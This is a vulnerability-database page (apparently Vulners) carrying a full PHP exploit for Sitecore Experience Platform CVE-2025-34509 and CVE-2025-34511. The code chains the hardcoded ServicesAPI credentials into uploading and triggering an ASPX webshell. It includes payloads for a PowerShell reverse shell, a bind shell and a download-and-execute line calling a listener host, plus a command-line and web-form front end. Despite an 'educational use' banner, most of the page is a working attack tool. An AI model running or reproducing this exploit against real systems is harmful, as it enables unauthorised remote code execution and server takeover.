Vulners
Lucene search
📄 Sitecore Experience Manager / Experience Platform 10.1 Shell Upload / Hardcoded Credentials
| Reporter | Title | Published | Views | Family All 33 |
|---|---|---|---|---|
 | CVE-2025-34509 | 17 Jun 202518:38 | – | circl |
| CVE-2025-34511 | 17 Jun 202519:39 | – | circl |
 | Sitecore Experience Platform和Sitecore Experience Manager 信任管理问题漏洞 | 17 Jun 202500:00 | – | cnnvd |
| Sitecore PowerShell Extensions 代码问题漏洞 | 17 Jun 202500:00 | – | cnnvd |
 | CVE-2025-34509 | 17 Jun 202518:20 | – | cve |
| CVE-2025-34511 | 17 Jun 202519:05 | – | cve |
 | CVE-2025-34509 Sitecore XM and XP Hardcoded Credentials | 17 Jun 202518:20 | – | cvelist |
| CVE-2025-34511 Sitecore PowerShell Extension RCE via Unrestricted Upload | 17 Jun 202519:05 | – | cvelist |
 | EUVD-2025-18524 | 3 Oct 202520:07 | – | euvd |
| EUVD-2025-18568 | 17 Jun 202519:05 | – | euvd |
10
=============================================================================================================================================
| # Title : Sitecore Experience Manager (XM) and Experience Platform (XP) v 10.1 File Upload & Hardcoded Credentials |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.sitecore.com/ |
=============================================================================================================================================
[+] Summary :
Critical Remote Code Execution vulnerability chain affecting Sitecore Experience Platform versions 10.0.0 through 10.4.x
combining hardcoded credentials with file upload vulnerabilities for complete system compromise.
[+] POC :
php poc.php or http://127.0.0.1/poc.php
<?php
class SitecoreXPExploit {
private $target;
private $port;
private $ssl;
private $base_path;
private $timeout;
private $cookies;
private $is_logged;
private $is_elevated;
private $webshell;
private $item_uri;
public function __construct($target, $port = 443, $ssl = true, $base_path = '/') {
$this->target = $target;
$this->port = $port;
$this->ssl = $ssl;
$this->base_path = rtrim($base_path, '/');
$this->timeout = 30;
$this->cookies = [];
$this->is_logged = false;
$this->is_elevated = false;
$this->webshell = null;
$this->item_uri = null;
}
public function check() {
echo "[*] Checking Sitecore XP vulnerability...\n";
if (!$this->login_identitysrv('ServicesAPI', 'b')) {
echo "[-] Could not log in, application might not be Sitecore\n";
return "unknown";
}
$this->is_logged = true;
echo "[+] Successfully logged in with hardcoded credentials\n";
if (!$this->get_identity_cookies()) {
echo "[-] Could not get elevated cookies\n";
return "safe";
}
$this->is_elevated = true;
echo "[+] Obtained elevated cookies\n";
$res = $this->send_request(
'/sitecore%20modules/Shell/PowerShell/UploadFile/PowerShellUploadFile2.aspx',
'GET',
['hdl' => '1245516121']
);
if (!$res || $res['code'] != 200) {
echo "[-] PowerShell extension not detected\n";
return "safe";
}
echo "[+] ✓ PowerShell extension detected - target is vulnerable\n";
$version = $this->get_version();
if ($version) {
echo "[+] Sitecore version: $version\n";
}
return "vulnerable";
}
private function login_identitysrv($username, $password) {
$login_data = [
'username' => $username,
'password' => $password,
'grant_type' => 'password',
'scope' => 'openid profile sitecore.profile api offline_access',
'client_id' => 'SitecoreShell',
'client_secret' => 'secret'
];
$res = $this->send_request(
'/identity/connect/token',
'POST',
[],
http_build_query($login_data),
['Content-Type: application/x-www-form-urlencoded']
);
if ($res && $res['code'] == 200) {
$json = json_decode($res['body'], true);
if (isset($json['access_token'])) {
$this->cookies['access_token'] = $json['access_token'];
return true;
}
}
return false;
}
private function get_identity_cookies() {
$headers = [
'Authorization: Bearer ' . $this->cookies['access_token']
];
$res = $this->send_request(
'/identity/connect/authorize',
'GET',
[
'client_id' => 'SitecoreShell',
'scope' => 'openid profile sitecore.profile api offline_access',
'response_type' => 'code',
'redirect_uri' => $this->build_url('/sitecore/login?returnUrl=%2fsitecore'),
'state' => $this->random_text(10),
'nonce' => $this->random_text(10)
],
null,
$headers
);
if ($res && $res['code'] == 302) {
if (preg_match_all('/Set-Cookie:\s*([^=]+)=([^;]+)/i', $res['headers'], $matches)) {
for ($i = 0; $i < count($matches[1]); $i++) {
$this->cookies[$matches[1][$i]] = $matches[2][$i];
}
return true;
}
}
return false;
}
private function get_version() {
$res = $this->send_request('/sitecore');
if ($res && $res['code'] == 200) {
// Try to extract version from page
if (preg_match('/Sitecore\s*([0-9]+\.[0-9]+\.[0-9]+)/i', $res['body'], $matches)) {
return $matches[1];
}
}
return "Unknown";
}
private function upload_webshell() {
$this->webshell = $this->random_text(15) . '.aspx';
$this->item_uri = $this->random_text(8);
$aspx_shell = $this->generate_aspx_shell();
$boundary = '----WebKitFormBoundary' . $this->random_text(16);
$data = "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"ItemUri\"\r\n\r\n";
$data .= "{$this->item_uri}\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"LanguageName\"\r\n\r\n";
$data .= "en\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"Overwrite\"\r\n\r\n";
$data .= "0\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"Unpack\"\r\n\r\n";
$data .= "0\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"Versioned\"\r\n\r\n";
$data .= "en\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"{$this->item_uri}\"; filename=\"{$this->webshell}\"\r\n";
$data .= "Content-Type: text/plain\r\n\r\n";
$data .= $aspx_shell . "\r\n";
$data .= "--{$boundary}--\r\n";
$headers = [
"Content-Type: multipart/form-data; boundary={$boundary}",
"Content-Length: " . strlen($data)
];
$cookie_header = $this->build_cookie_header();
if ($cookie_header) {
$headers[] = $cookie_header;
}
$res = $this->send_request(
'/sitecore%20modules/Shell/PowerShell/UploadFile/PowerShellUploadFile2.aspx',
'POST',
['hdl' => '1245516121'],
$data,
$headers
);
return $res && $res['code'] == 200;
}
private function generate_aspx_shell($payload_type = 'cmd', $lhost = null, $lport = null) {
$command = $this->generate_payload($payload_type, $lhost, $lport);
$aspx = '<%@ Page Language="C#" %>';
$aspx .= '<%@ Import Namespace="System.Diagnostics" %>';
$aspx .= '<%@ Import Namespace="System.IO" %>';
$aspx .= '<script runat="server">';
$aspx .= 'void Page_Load(object sender, EventArgs e) {';
$aspx .= ' try {';
$aspx .= ' ProcessStartInfo psi = new ProcessStartInfo();';
$aspx .= ' psi.FileName = "cmd.exe";';
$aspx .= ' psi.Arguments = "/c ' . addslashes($command) . '";';
$aspx .= ' psi.RedirectStandardOutput = true;';
$aspx .= ' psi.UseShellExecute = false;';
$aspx .= ' Process p = Process.Start(psi);';
$aspx .= ' string output = p.StandardOutput.ReadToEnd();';
$aspx .= ' p.WaitForExit();';
$aspx .= ' Response.Write("<pre>" + Server.HtmlEncode(output) + "</pre>");';
$aspx .= ' } catch (Exception ex) {';
$aspx .= ' Response.Write("Error: " + Server.HtmlEncode(ex.Message));';
$aspx .= ' }';
$aspx .= '}';
$aspx .= '</script>';
return $aspx;
}
private function trigger_webshell() {
if (!$this->webshell || !$this->item_uri) {
return false;
}
$res = $this->send_request(
"/sitecore%20modules/Shell/PowerShell/UploadFile/{$this->item_uri}/{$this->webshell}",
'GET'
);
return $res !== false;
}
public function exploit($payload_type = 'cmd', $lhost = null, $lport = null) {
echo "[*] Starting Sitecore XP exploitation...\n";
if (!$this->is_logged && !$this->login_identitysrv('ServicesAPI', 'b')) {
echo "[-] Failed to log in with hardcoded credentials\n";
return false;
}
$this->is_logged = true;
echo "[+] Logged in successfully\n";
if (!$this->is_elevated && !$this->get_identity_cookies()) {
echo "[-] Failed to get elevated cookies\n";
return false;
}
$this->is_elevated = true;
echo "[+] Obtained elevated cookies\n";
echo "[*] Uploading web shell...\n";
if (!$this->upload_webshell()) {
echo "[-] Failed to upload web shell\n";
return false;
}
echo "[+] Web shell uploaded: {$this->webshell}\n";
echo "[*] Triggering web shell execution...\n";
if ($this->trigger_webshell()) {
echo "[+] ✓ Web shell triggered successfully\n";
echo "[*] Check your listener for connection\n";
return true;
} else {
echo "[-] Failed to trigger web shell\n";
return false;
}
}
private function generate_payload($type, $lhost, $lport) {
switch ($type) {
case 'reverse_shell':
if (!$lhost || !$lport) {
return 'whoami & hostname & ipconfig';
}
return "powershell -nop -c \"\$client = New-Object System.Net.Sockets.TCPClient('{$lhost}',{$lport});\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};\$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (pwd).Path + '> ');\$stream.Write(\$sendbytes,0,\$sendbytes.Length);while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);}\"";
case 'bind_shell':
if (!$lport) {
return 'whoami & hostname & systeminfo';
}
return "powershell -nop -c \"\$listener = New-Object System.Net.Sockets.TcpListener({$lport});\$listener.Start();while(\$true){\$client = \$listener.AcceptTcpClient();\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};\$data = \$stream.Read(\$bytes, 0, \$bytes.Length);\$input = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$data);\$sendback = (iex \$input 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);}\"";
case 'meterpreter':
if (!$lhost || !$lport) {
return 'whoami & hostname';
}
return "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://{$lhost}:8080/payload.ps1')\"";
case 'cmd':
default:
return 'whoami & hostname & ipconfig & dir C:\\';
}
}
private function send_request($path, $method = 'GET', $params = [], $data = null, $custom_headers = []) {
$url = $this->build_url($path);
if ($method == 'GET' && !empty($params)) {
$url .= '?' . http_build_query($params);
}
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => $this->timeout,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
CURLOPT_HEADER => true,
CURLOPT_CUSTOMREQUEST => $method,
CURLOPT_FOLLOWLOCATION => false
]);
if ($method == 'POST' && $data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}
$headers = array_merge([
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
], $custom_headers);
$cookie_header = $this->build_cookie_header();
if ($cookie_header) {
$headers[] = $cookie_header;
}
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($response) {
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$headers = substr($response, 0, $header_size);
$body = substr($response, $header_size);
return [
'code' => $http_code,
'headers' => $headers,
'body' => $body
];
}
return false;
}
private function build_cookie_header() {
if (empty($this->cookies)) {
return null;
}
$cookie_parts = [];
foreach ($this->cookies as $name => $value) {
$cookie_parts[] = "{$name}={$value}";
}
return 'Cookie: ' . implode('; ', $cookie_parts);
}
private function random_text($length = 8) {
$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$result = '';
for ($i = 0; $i < $length; $i++) {
$result .= $chars[rand(0, strlen($chars) - 1)];
}
return $result;
}
private function build_url($path) {
$protocol = $this->ssl ? 'https' : 'http';
$full_path = $this->base_path . $path;
return "{$protocol}://{$this->target}:{$this->port}{$full_path}";
}
}
if (php_sapi_name() === 'cli') {
echo "
╔══════════════════════════════════════════════════════════════╗
║ Sitecore XP RCE Exploit ║
║ CVE-2025-34511 & CVE-2025-34509 ║
║ PHP Implementation ║
╚══════════════════════════════════════════════════════════════╝
\n";
$options = getopt("t:p:s:u:c:P:L:H:", [
"target:",
"port:",
"ssl",
"uri:",
"check",
"payload:",
"lhost:",
"lport:"
]);
$target = $options['t'] ?? $options['target'] ?? null;
$port = $options['p'] ?? $options['port'] ?? 443;
$ssl = isset($options['s']) || isset($options['ssl']);
$base_uri = $options['u'] ?? $options['uri'] ?? '/';
$check_only = isset($options['c']) || isset($options['check']);
$payload_type = $options['P'] ?? $options['payload'] ?? 'cmd';
$lhost = $options['H'] ?? $options['lhost'] ?? null;
$lport = $options['L'] ?? $options['lport'] ?? 4444;
if (!$target) {
echo "Usage: php sitecore_exploit.php [options]\n";
echo "Options:\n";
echo " -t, --target Target host (required)\n";
echo " -p, --port Target port (default: 443)\n";
echo " -s, --ssl Use SSL (default: true)\n";
echo " -u, --uri Base URI path (default: /)\n";
echo " -c, --check Check only (don't exploit)\n";
echo " -P, --payload Payload type: cmd, reverse_shell, bind_shell, meterpreter (default: cmd)\n";
echo " -H, --lhost Listener host for reverse shell\n";
echo " -L, --lport Listener port for reverse shell (default: 4444)\n";
echo "\nExamples:\n";
echo " php sitecore_exploit.php -t 192.168.1.100 -c\n";
echo " php sitecore_exploit.php -t sitecore.company.com -P reverse_shell -H 10.0.0.5 -L 4444\n";
exit(1);
}
$exploit = new SitecoreXPExploit($target, $port, $ssl, $base_uri);
if ($check_only) {
$result = $exploit->check();
echo "\n[*] Result: {$result}\n";
} else {
if ($exploit->exploit($payload_type, $lhost, $lport)) {
echo "[+] Exploitation completed successfully\n";
} else {
echo "[-] Exploitation failed\n";
}
}
} else {
$action = $_POST['action'] ?? '';
if ($action === 'check' || $action === 'exploit') {
$target = $_POST['target'] ?? '';
$port = $_POST['port'] ?? 443;
$ssl = isset($_POST['ssl']);
$base_uri = $_POST['uri'] ?? '/';
$payload_type = $_POST['payload_type'] ?? 'cmd';
$lhost = $_POST['lhost'] ?? '';
$lport = $_POST['lport'] ?? 4444;
if (empty($target)) {
echo "<div style='color: red; padding: 10px; border: 1px solid red; margin: 10px;'>Target host is required</div>";
} else {
$exploit = new SitecoreXPExploit($target, $port, $ssl, $base_uri);
ob_start();
if ($action === 'check') {
$exploit->check();
} else {
$exploit->exploit($payload_type, $lhost, $lport);
}
$output = ob_get_clean();
echo "<pre style='background: #f4f4f4; padding: 15px; border: 1px solid #ddd; border-radius: 4px;'>$output</pre>";
}
echo '<a href="' . htmlspecialchars($_SERVER['PHP_SELF']) . '" style="display: inline-block; padding: 10px 20px; background: #007cba; color: white; text-decoration: none; border-radius: 4px; margin: 10px 0;">Back to Form</a>';
} else {
echo '<!DOCTYPE html>
<html>
<head>
<title>Sitecore XP RCE Exploit</title>
<meta charset="UTF-8">
<style>
body {
font-family: Arial, sans-serif;
margin: 0;
padding: 20px;
background: #f5f5f5;
}
.container {
max-width: 800px;
margin: 0 auto;
background: white;
padding: 30px;
border-radius: 8px;
box-shadow: 0 2px 10px rgba(0,0,0,0.1);
}
h1 {
color: #333;
border-bottom: 2px solid #007cba;
padding-bottom: 10px;
}
h3 {
color: #666;
}
.form-group {
margin-bottom: 20px;
}
label {
display: block;
margin-bottom: 8px;
font-weight: bold;
color: #333;
}
input[type="text"], select {
width: 100%;
padding: 10px;
border: 1px solid #ddd;
border-radius: 4px;
box-sizing: border-box;
font-size: 14px;
}
.checkbox-group {
display: flex;
align-items: center;
gap: 10px;
}
button {
background: #007cba;
color: white;
padding: 12px 25px;
border: none;
border-radius: 4px;
cursor: pointer;
margin-right: 10px;
font-size: 16px;
transition: background 0.3s;
}
button:hover {
background: #005a87;
}
.danger {
background: #dc3545;
}
.danger:hover {
background: #c82333;
}
.info {
background: #17a2b8;
}
.info:hover {
background: #138496;
}
.warning-box {
background: #fff3cd;
border: 1px solid #ffeaa7;
color: #856404;
padding: 15px;
border-radius: 4px;
margin: 20px 0;
}
.info-box {
background: #d1ecf1;
border: 1px solid #bee5eb;
color: #0c5460;
padding: 15px;
border-radius: 4px;
margin: 20px 0;
}
</style>
</head>
<body>
<div class="container">
<h1>Sitecore XP RCE Exploit</h1>
<h3>CVE-2025-34511 & CVE-2025-34509 - File Upload & Hardcoded Credentials</h3>
<div class="warning-box">
<strong> Educational Use Only:</strong> This tool demonstrates critical vulnerabilities in Sitecore XP.
Use only on systems you own or have explicit permission to test.
</div>
<form method="post">
<div class="form-group">
<label for="target">Target Host:</label>
<input type="text" id="target" name="target" placeholder="192.168.1.100 or sitecore.company.com" required>
</div>
<div class="form-group">
<label for="port">Port:</label>
<input type="text" id="port" name="port" value="443">
</div>
<div class="form-group">
<label for="uri">Base URI:</label>
<input type="text" id="uri" name="uri" value="/">
</div>
<div class="form-group">
<div class="checkbox-group">
<input type="checkbox" id="ssl" name="ssl" checked>
<label for="ssl" style="display: inline; font-weight: normal;">Use SSL</label>
</div>
</div>
<div class="form-group">
<label for="payload_type">Payload Type:</label>
<select id="payload_type" name="payload_type">
<option value="cmd">Test Command</option>
<option value="reverse_shell">Reverse Shell</option>
<option value="bind_shell">Bind Shell</option>
<option value="meterpreter">Meterpreter</option>
</select>
</div>
<div class="form-group">
<label for="lhost">Listener Host (for reverse shell):</label>
<input type="text" id="lhost" name="lhost" placeholder="Your IP address: 192.168.1.100">
</div>
<div class="form-group">
<label for="lport">Listener Port (for reverse shell):</label>
<input type="text" id="lport" name="lport" value="4444">
</div>
<button type="submit" name="action" value="check" class="info">Check Vulnerability</button>
<button type="submit" name="action" value="exploit" class="danger">Execute Exploit</button>
</form>
<div class="info-box">
<h3>About the CVEs:</h3>
<p><strong>CVE-2025-34509:</strong> Hardcoded credentials for ServicesAPI account (username: ServicesAPI, password: b)</p>
<p><strong>CVE-2025-34511:</strong> File upload vulnerability in PowerShell extensions</p>
<p><strong>Affected Versions:</strong> Sitecore XP 10.0.0 to 10.4.x</p>
<p><strong>Impact:</strong> Remote Code Execution via file upload</p>
<p><strong>Exploit Chain:</strong> Hardcoded Credentials → Authentication → File Upload → RCE</p>
</div>
</div>
</body>
</html>';
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Feb 2026 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.17.5 - 8.8
EPSS0.38428
SSVC